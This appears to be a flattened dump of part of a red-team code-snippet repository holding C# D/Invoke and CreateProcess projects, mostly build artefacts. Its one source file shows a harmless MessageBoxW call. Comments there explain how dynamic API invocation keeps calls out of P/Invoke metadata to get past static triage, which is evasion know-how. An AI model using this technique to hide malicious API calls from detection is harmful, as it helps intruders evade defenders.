| } -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/CreateProcess.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | b351b3d00ca3c03e51b59834718911d9c23098dd 2 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = CreateProcess 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess\CreateProcess\ 4 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache -------------------------------------------------------------------------------- 
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 3fadf03217e11926521b06ed9b8085675261cf23 2 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 3881e9f28961f9ea3c56435a33a20e8625ca3050 2 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb -------------------------------------------------------------------------------- 
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "saUOiuZs4N1XGJjv8U8hSTphYX/o7jDBupib+9SsVYrMLsjiGA5Ef9mmzG37uAFnWIrBwREfu6Zl4SY+Vdtdpg==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess\\CreateProcess\\CreateProcess.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/CreateProcess/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 
13 | "runtime": { 14 | "ConsoleApp1.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "ConsoleApp1/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- 
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 
|  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess_DInvoke\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 3b5c6a64568502b382a025d7d63fc56001b8cfc2 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- 
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "s0Rx2AjoogtPrzhPqICiGoIAaOhAaXq7236tFh1d2TUSXH6RhgLHIZ70CFol5UH1GdlgyQTBfhaddK/3tF5Lag==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess_DInvoke\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/MessageBoxW_DInvoke.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | using DInvoke.DynamicInvoke; 5 | 6 | namespace MessageBoxW_DInvoke 7 | { 8 | /* Minimal console program: shows one MessageBoxW dialog from user32.dll, reaching the export through D/Invoke's Generic.DynamicAPIInvoke instead of a [DllImport] declaration. */ class Program 9 | { 10 | 
/* Managed signature used to marshal the native call: StdCall, strings passed as Unicode. Parameter order follows the Win32 MessageBoxW prototype (hWnd, lpText, lpCaption, uType); the third parameter is spelled pCaption here. */ [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)] 11 | delegate int MessageBoxW(IntPtr hWnd, string lpText, string pCaption, uint uType); 12 | /* Entry point; args is not read. */ static void Main(string[] args) 13 | { 14 | /* Arguments boxed in delegate order: no owner window (IntPtr.Zero), body text, caption, uType 0 (MB_OK in the Win32 headers). */ var parameters = new object[] { IntPtr.Zero, "My first D/Invoke!", "Hello world!", (uint)0 }; 15 | /* Hands the DLL name, export name, delegate type and argument array to D/Invoke, which (per that library) resolves the export at run time and calls it through the delegate; the returned object is discarded. NOTE(review): no [DllImport] exists for this API, so it will not appear in the assembly's P/Invoke metadata; static triage has to rely on the "user32.dll" / "MessageBoxW" string literals and the DInvoke.dll reference, and runtime detection on module-load and API-call telemetry. */ Generic.DynamicAPIInvoke("user32.dll", "MessageBoxW", typeof(MessageBoxW), ref parameters); 16 | 17 | } 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "MessageBoxW_DInvoke/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "MessageBoxW_DInvoke.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 
20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "MessageBoxW_DInvoke/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.dev.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 43c8296b4e0a8fdf49a8348a6a774af279b8e8ec 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = MessageBoxW_DInvoke 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\ 4 | 
-------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8080b4b6e0ab0736b80891287505de97fbf66b6c 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 0a28cd972ee4b2cfc5ff5e631d3d6ec2b8dd35a3 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | f1d791e42d3bccd1c48106d85910be18dbf5cba6 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = MessageBoxW_DIvoke 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\ 4 | -------------------------------------------------------------------------------- 
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DInvoke.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DIvoke.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/project.nuget.cache: 
-------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "dxJv26YaFJvd5EeJoi/kq1XCYG6OAtayh6Z4OWkVUt5fmhy1yk8PQULjnZic8qEi8RGRncwiqV4zWb6W/GZkBw==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DInvoke.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "ConsoleApp1.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "ConsoleApp1/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 
